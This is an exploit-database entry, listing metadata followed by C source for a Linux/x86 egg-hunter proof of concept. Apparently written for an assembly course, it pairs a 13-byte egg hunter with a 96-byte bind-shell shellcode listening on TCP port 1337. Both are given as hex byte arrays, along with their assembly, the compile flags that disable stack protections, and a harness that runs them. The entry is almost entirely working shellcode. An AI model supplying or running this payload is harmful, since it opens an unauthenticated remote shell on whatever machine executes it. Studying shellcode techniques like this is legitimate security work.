Linux/x86 - Egg-hunter Shellcode (13 bytes)

2016-01-08T00:00:00

Description

{"id": "1337DAY-ID-25648", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Linux/x86 - Egg-hunter Shellcode (13 bytes)", "description": "", "published": "2016-01-08T00:00:00", "modified": "2016-01-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/25648", "reporter": "Dennis Herrmann", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-04T16:09:06", "viewCount": 10, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "_state": {"dependencies": 1663695782, "score": 1663695947}, "_internal": {"score_hash": "426179c76e31bd892e5b1b664cd3b207"}, "sourceHref": "https://0day.today/exploit/25648", "sourceData": "/*\n * Title: Egg Hunter PoC\n * Platform: linux/x86\n * Date: 2015-01-07\n * Author: Dennis 'dhn' Herrmann\n * Website: https://zer0-day.pw\n * Github: https://github.com/dhn/SLAE/\n * SLAE-721\n */\n \n/*\n * egg_hunter.nasm\n * ---------------\n * BITS 32\n *\n * global _start\n * section .text\n *\n * EGG_SIG equ 0x4f904790 ; signature\n *\n * _start:\n * cdq ; zero out edx\n * mov edx, EGG_SIG ; edx = 0x4f904790\n *\n * search_the_egg:\n * inc eax ; increment eax\n * cmp DWORD [eax], edx ; compare eax with the EGG_SIG\n * jne search_the_egg ; if not compare jump to search_the_egg\n *\n * jmp eax ; jump to eax\n *\n */\n#include <stdio.h>\n#include <string.h>\n \n/*\n * Egg Signature:\n *\n * 0x4f 0x90 0x47 0x90\n * | | | |\n * dec edi - NOP - inc edi - NOP\n */\n#define EGG_SIG \"\\x90\\x47\\x90\\x4f\"\n \nunsigned char egg_hunter[] = \\\n \"\\x99\" /* cdq */\n \"\\xba\\x90\\x47\\x90\\x4f\" /* mov edx, 0x4f904790 */\n \"\\x40\" /* inc eax */\n \"\\x39\\x10\" /* cmp DWORD PTR [eax], edx */\n \"\\x75\\xfb\" /* jne 6 <search_the_egg> */\n \"\\xff\\xe0\"; /* jmp eax */\n \n/*\n * Bind Shell TCP shellcode - 96 byte\n * bind to port: 1337\n */\nunsigned char shellcode[] = \\\n EGG_SIG /* Egg Signature */\n \"\\x6a\\x66\\x58\\x6a\\x01\\x5b\\x31\\xf6\"\n \"\\x56\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\"\n \"\\x80\\x5f\\x97\\x93\\xb0\\x66\\x56\\x66\"\n \"\\x68\\x05\\x39\\x66\\x6a\\x02\\x89\\xe1\"\n \"\\x6a\\x10\\x51\\x57\\x89\\xe1\\xcd\\x80\"\n \"\\xb0\\x66\\xb3\\x04\\x56\\x57\\x89\\xe1\"\n \"\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x56\\x56\"\n \"\\x57\\x89\\xe1\\xcd\\x80\\x93\\x31\\xc9\"\n \"\\xb1\\x03\\xfe\\xc9\\xb0\\x3f\\xcd\\x80\"\n \"\\x75\\xf8\\x6a\\x0b\\x58\\x31\\xc9\\x51\"\n \"\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\"\n \"\\x69\\x6e\\x89\\xe3\\x89\\xca\\xcd\\x80\";\n \n/*\n * $ gcc -Wl,-z,execstack -fno-stack-protector PoC.c -o PoC\n * [+] Egg Hunter Length: 13\n * [+] Shellcode Length + 4 byte egg: 100\n *\n */\nvoid main()\n{\n printf(\"[+] Egg Hunter Length: %d\\n\", strlen(egg_hunter));\n printf(\"[+] Shellcode Length + 4 byte egg: %d\\n\", strlen(shellcode));\n int (*ret)() = (int(*)())egg_hunter;\n ret();\n}\n", "category": "shellcode", "verified": true}